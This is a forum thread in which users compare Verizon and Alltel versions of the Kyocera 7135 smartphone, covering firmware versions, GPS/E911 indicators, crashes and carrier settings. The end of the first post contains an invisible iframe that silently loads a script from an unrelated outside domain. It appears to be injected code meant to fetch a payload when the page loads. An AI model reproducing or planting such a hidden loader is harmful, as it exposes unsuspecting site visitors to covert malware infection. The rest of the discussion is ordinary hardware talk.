+ Reply to Thread
Page 1 of 2 1 2 LastLast
Results 1 to 20 of 37
  1. #1
    Registered User Beryl's Avatar
    Join Date
    09-11-2002
    Location
    Colorado
    Posts
    1,912

    Comparing Verizon and Alltel Phones

    I received my new 7135 directly from Verizon today and I've got 15 days to decide if I'm returning it.

    Hardware

    1. The screen is NO different than my GC/Alltel 7135. I'd hoped there would be a difference so I could keep it but -- nope. The clarity, brightness, contrast -- everything -- is the same.
    2. The Palm on/off button (little light bulb) is EXACTLY the same. It has the same tactical feel
    3. Speed -- no difference. I haven't loaded my software yet but the built-in apps came up just as slow (er) fast.
    4. The ugly Verizon logo is on the case.

    Software

    1. Version: SZ - 23/ MZ- 36
    2. WAP Settings: 153 114 115 100/9203 :o
    3. Phone Pref:
    .....added Quick Contact Match
    .....Roam Option - Automatic A & Automatic B instead of "Standard"
    4. EIS Web: Version 1.20.1.9 (instead of 1.20.1.5)
    5. Filemanager 1.12 (instead of 1.11)
    6. Network setting -- preset for 1X (not available in Colorado) but the QNC connection is there too. This is new for me since didn't delete this prior to installing the first time.
    7. KWC_ABLookuphash (new -- might have gotten the spelling wrong)

    The GPS icon is enabled with 2 right parentheses to the right of the symbol.

    I called Verizon and they confirmed that the differences are minor and didn't have a problem with me shipping the new one back. They also confirmed that I can go to my Verizon store eventually and get the firmware upgraded.

    I'm activating it and I'm leaning towards keeping the new one only because E911 GPS is working now. I hate that Verizon logo! <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    02-20-2003
    Location
    VT
    Posts
    264
    So do we suspect/know, then, that they did make changes to the E911 system, and that it will work differently on the VZW phone? You are probably aware that the )) to the right of the GPS icon indicates that the phone is passing your GPS location to the provider's system as well as E911, rather than just to the E911 system, and can be toggled. (Phone Prefs, Phone Service tab, Position Location dropdown.)

    Thanks for the side-by-side summary!

  3. #3
    Registered User Beryl's Avatar
    Join Date
    09-11-2002
    Location
    Colorado
    Posts
    1,912
    You are right. I get the "GPS to share location w/emergency service as well as your service provider" symbol with "location" selected.

    On the GC/Alltel phone, I either get the emergency services only symbol with the "location" phone setting OR the gps symbol with a red line through it (symbol not in the manual) with the "911" phone setting.

  4. #4
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Berly... thanks for the great (and thorough) comparison! Did you take them both into a pitch dark room to see if there was any difference in the backlighting for the dialpad and graffiti area?
    Please visit my picture site: Robert-O-Rama :)

  5. #5
    Registered User
    Join Date
    03-08-2002
    Posts
    325
    Beryl - Could you do me a favor once you have activated the phone and completed the *228 1 and *228 2 programming. Please let me know if when you open your phone in the phone mode (or switch to the phone mode) the banner says "Verizon Wireless" and then switches to your personal banner in about 30 seconds. I just want to know whether this is normal or whether something is wrong with my phone. Thanks.

  6. #6
    Registered User
    Join Date
    10-22-2002
    Posts
    120
    So are we saying the firmware update to the alltel phones will not work the same as the verizon phones in regard to GPS?
    If at first you don't succeed, don't try sky diving.

  7. #7
    Registered User Beryl's Avatar
    Join Date
    09-11-2002
    Location
    Colorado
    Posts
    1,912
    Originally posted by Robert K.
    Did you take them both into a pitch dark room to see if there was any difference in the backlighting for the dialpad and graffiti area?
    LOL!! No, I hadn't until reading this. No significant difference at all. Just the phone symbol (above the Find) was a little brighter. Not noteworthy.

  8. #8
    Registered User Beryl's Avatar
    Join Date
    09-11-2002
    Location
    Colorado
    Posts
    1,912
    Originally posted by RMSko
    Beryl - Could you do me a favor once you have activated the phone and completed the *228 1 and *228 2 programming. Please let me know if when you open your phone in the phone mode (or switch to the phone mode) the banner says "Verizon Wireless" and then switches to your personal banner in about 30 seconds. I just want to know whether this is normal or whether something is wrong with my phone. Thanks.
    Yes -- the same thing happens on my phone. Gotta admit that I like that gray Verizon banner. It is pretty.

    @ Steve
    I don't know about the firmware updates to the Alltel phones. I have an original Alltel phone that is being compared to a Verizon phone which comes with a newer firmware.

    Another thing...
    Regarding the RSD not happening. True but there are fatal exceptions and just pressing the button on the display won't reset it. You still have to press the reset button in the back to get control. I got several right away. Eudora web would crash each time. I deleted everything associated with the Eudora browser and mail, hard reset , beamed over my bookmarks and it is relatively stable now. We'll see..... 14 more days left.

  9. #9
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by Beryl
    LOL!! No, I hadn't until reading this. No significant difference at all. Just the phone symbol (above the Find) was a little brighter. Not noteworthy.
    Thanks Beryl!
    Please visit my picture site: Robert-O-Rama :)

  10. #10
    Registered User
    Join Date
    02-20-2003
    Location
    VT
    Posts
    264
    Originally posted by Beryl
    Another thing...
    Regarding the RSD not happening. True but there are fatal exceptions and just pressing the button on the display won't reset it. You still have to press the reset button in the back to get control. I got several right away. Eudora web would crash each time. I deleted everything associated with the Eudora browser and mail, hard reset , beamed over my bookmarks and it is relatively stable now. We'll see..... 14 more days left.
    Thanks for clearing up the GPS differences for me, Beryl.

    I also had a problem with Eudora Web when I first got my phone. It would cause a reset every time. I eventually found while looking in Filez that there were two copies of Eudora Web-- The built-in one, and the one that I had had before on my old Visor. (oops!) Immediately deleted the old one and everything that went with it, and it's been working perfectly ever since. I was wondering if the versions of Eudora Web on the two phones were the same?

    (BTW, yes, I'm afraid I did my install the "bad" way: After deleting the prefs files, I synced to my old config. With almost 350 apps and databases, I couldn't stand the thought of reinstalling everything. Immediately tested all apps, and deleted the two or three that crashed. So far so good. (Knock on wood. ))

  11. #11
    Registered User Beryl's Avatar
    Join Date
    09-11-2002
    Location
    Colorado
    Posts
    1,912
    More notables:
    1. Filemanager now works without the error some of us were getting. Dang! I can't find that thread. I got the error each time brought it up but pressing "OK" or the like would still permit use of the program.
    2. Still getting duplicate messages
    3. Still get the occasional screen contrast problem.

    My take so far is this: If you have an Altel/GC device, you are not missing much with the Verizon model except the ugly logo on the front. I may change my mind if I get the GPS locater to do cool stuff with PQAs.

    @ Turbocat

    Yeah, I did the same "dumb" thing but thought it would be OK since the phones were "the same". I used my BBVFS backup. Nope. It is still smart to move everything out of the backup directory and install the files manually. The nice thing about doing that is that you really know what you are putting on your device no matter how non-descriptive (default.pdb=Thesaurus). You'll have to rebuild your Saved_Preferences from scratch. After what I just went through, I'm guessing that people who do firmware upgrades might want to do the same thing.

  12. #12
    Registered User
    Join Date
    10-03-2002
    Posts
    201
    Folks,

    A couple of things...

    1) Regarding the RSD problems, I have been working with the newer firmware on an Alltel Phone (SZ - 23/ MZ- 36) and though the RSD problems are gone, the phone is not handling standard Palm exceptions properly -- most times the fatal exception dialog pops up the phone is still locked up. This is really unacceptable and unbelievable. It probably means that Kyocera can't even debug lockup problems.

    2) The GPS settings showing differently are probably not a difference in the firmware or the hardware, but a setting in the Kyocera PST program to enable these displays. I have played around with some of these, and my phone know shows "1X" where the "D" was when the phone is in a high speed area. This was not a feature of the newer firmware; it was simply a setting that Alltel did not enable.

    What would really help us Alltel people is if someone with access to Kyocera's PST could back up all the Verizon settings from a real Verizon phone. If someone wants to PM me I can help them do this.

    This, in combination with the firmware on Kyocera's website (for SZ - 23/ MZ- 36) would turn an Alltel phone into a real Verizon one.

    Also, if Verizon is shipping additional programs on the CD with the phone, it would be good to get this too.

    Glenn

  13. #13
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by glenn_butler
    Folks,

    A couple of things...


    2) The GPS settings showing differently are probably not a difference in the firmware or the hardware, but a setting in the Kyocera PST program to enable these displays. I have played around with some of these, and my phone know shows "1X" where the "D" was when the phone is in a high speed area. This was not a feature of the newer firmware; it was simply a setting that Alltel did not enable.

    Just out of curiosity, in case we can get a willing helper at a Verizon service center or somehow have a copy of KWPST, what setting controls the D v.s 1x?

    p.s. please check your PM's once in a while.....

    Alan

  14. #14
    Registered User
    Join Date
    02-12-2003
    Posts
    78
    o I was wright by buying the phone long time ago. by what i hear from you guys the old suftware is better.

  15. #15
    Registered User Steve's Avatar
    Join Date
    10-02-2002
    Posts
    1,694
    Originally posted by alanb
    Just out of curiosity, in case we can get a willing helper at a Verizon service center or somehow have a copy of KWPST, what setting controls the D v.s 1x?

    p.s. please check your PM's once in a while.....

    Alan
    I got both a VZ phone and KWPST --- haven't had time to even sync my phone yet but I have played with many of the settings. I haven't touched the phone to the cradle yet but I will soon & when I get time I will install KWPST -- PM me sometime and I will do what I can to give you guys the Verizon settings I have.
    iPhone therefore iAm.

  16. #16
    Registered User
    Join Date
    01-08-2003
    Posts
    18

    what's the Difference

    I was comparing my new Verizon 7135 to my alltell 7135. I bought the altell first then I bought the verizon one last week. I noticed a few diff's. in the altell left top corner in phone mode the D for service is not on the verizon phone. It is replaced with a 1X . The emer gps locator on the altell is diff from the verizon one. I have also noticed that the speaker phone volume is a bit louder on the new verizon vs the altell. I was just wondering if anybody else noticed these changes. Thanks for such a great forum and having awsome people on it as well.
    Thomas

    6035 Kyocera Smartphone

    7135 Kyocera Smartphone


  17. #17
    Registered User Steve's Avatar
    Join Date
    10-02-2002
    Posts
    1,694
    Markito and I compared ours at lunch yesterday and we did a little "race" to see whose phone's would power up faster:

    1, 2, 3. GO!

    They both ran the Kyocera anaimation,

    (Go 7135 Go!)

    They both scrolled the Verizon Logo,

    (BTW, Your welcome for the color verzion Markito )

    They both said "Powering on..." the whole time, but mine smoked Markito's and turned on very quickly after the Verizon logo. His took another 10 seconds or so.

    Later we determined his unit barely had any memory left available so that may have been slowing things down on his phone, not sure if/how that impacts the speed of the phone or not.

    The "Power off Race" was a tie.
    iPhone therefore iAm.

  18. #18
    Registered User
    Join Date
    01-27-2003
    Posts
    252
    Ok, where do I start.....

    Well I have been using a Alltel 7135 for about 3 months now. I also purchased a Verizon 7135 last week. I decided to start from scratch on the New Verizon 7135 instead of trying to restore/backup from the Alltel to the Verizon. So I started to install everything from scratch, I even rest all my desktop Palm stuff (bought a new computer also) I ended up loading about 90% of the applications and hacks that I had on my Alltel 7135 and all I can say is that the Verizon 7135 is giving me nothing but headaches!!

    When I was reading this forum I noticed people complaining about different things with their Alltel 7135 even though I never experienced any of them! keep in mind I have lots of apps and hacks and I use this thing very heavily!

    Things like: Contrast being washed out on open flip or from wake palm. I get white blank screen sometimes on open flip (all fixed USUALLY by closing and re-opening) The Contrast issue sometimes needs to be redone in the PDA Prefs again. I get a LOT of Fatal Exceptions errors. on my Alltel 7135 I think from all of the use and BETA programs that I tested I got maybe 3 !! I get Fatal Exceptions errors using EN (40% of the time!) I even was in Snapper Mail and I told it to Manually fetch mail, I was NOT connected to the EN service so the phone put up the window that it was trying to connect and it took a very long time and the dialogue stayed on the screen saying I think (Initializing connection) So I decided to do a Soft rest on the back and once I did that my 7135 restarted with NOTHING on the palm! (back to factory settings!!) I lost everything, the phone did a self HARD RESET !! So I decided to REBUILD the 7135 AGAIN from scratch instead of recovering my data either through BackupBuddy VFS or Palm Hotsync, and I still have the same problems. So yesterday I re-ordered a new Verizon 7135 again which I should have today and I'm hoping I just had a bad unit! I really don't think a lot of these issues are software related since my OLDER Alltel 7135 with OLDER software worked like a charm and a new Verizon 7135 with newer software had ALL of the old issues people talked about on this board!

    Well I guess I will know later tonight what the outcome is!

    Bob

  19. #19
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by Steve
    Later we determined his unit barely had any memory left available so that may have been slowing things down on his phone, not sure if/how that impacts the speed of the phone or not.
    Wait a sec... isn't Markito the dude with 5+ SD cards? And he still can't manage to keep some space available in RAM? :p
    Please visit my picture site: Robert-O-Rama :)

  20. #20
    Registered User
    Join Date
    02-12-2003
    Posts
    78
    As they say if it works don't tuch.even my granddoughter say all the time don't tuch and she is only 4.
    I also has the phone from get connected with altel logo but conected to VZ.I change the logo to VZ from this forum.and use it all day havily.as a bipper as a massaging e-mail.phone and you name it noPROBLEMS.I don't going to chenge it to the VZ one.for what?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts